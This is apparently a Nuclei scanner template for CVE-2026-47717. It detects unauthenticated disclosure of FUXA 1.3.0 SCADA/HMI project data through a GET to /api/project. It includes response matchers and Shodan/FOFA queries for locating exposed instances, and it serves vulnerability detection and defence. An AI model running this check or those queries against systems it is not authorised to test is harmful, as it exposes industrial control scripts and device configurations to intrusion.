id: CVE-2026-47717 info: name: FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure author: pussycat0x severity: high description: | FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions. remediation: | Upgrade to fuxa-server version 1.3.1 or later. reference: - https://github.com/advisories/GHSA-q3w6-q3hc-c5x6 - https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-47717 epss-score: 0.01204 epss-percentile: 0.66247 cwe-id: CWE-201 metadata: verified: true max-request: 1 vendor: frangoteam product: fuxa shodan-query: http.title:"FUXA" fofa-query: title="FUXA" tags: cve,cve2026,fuxa,ics,scada,unauth,exposure http: - method: GET path: - "{{BaseURL}}/api/project" headers: Accept: application/json matchers: - type: dsl dsl: - "status_code == 200" - "contains(header, 'application/json')" - "contains_all(body, 'scripts','id')" - "contains_any(body, 'devices','hmi','alarms','views','variables')" condition: and # digest: 4a0a004730450220092bffe87a3596d492b3b8a28796e991a917614b71ad16a9b7040fb28ebf0a8e022100fa9fa56735d33d6579d25a208744ef9bcf95161295bed16af155e3de0272a3be:922c64590222798bb761d5b6d8e72950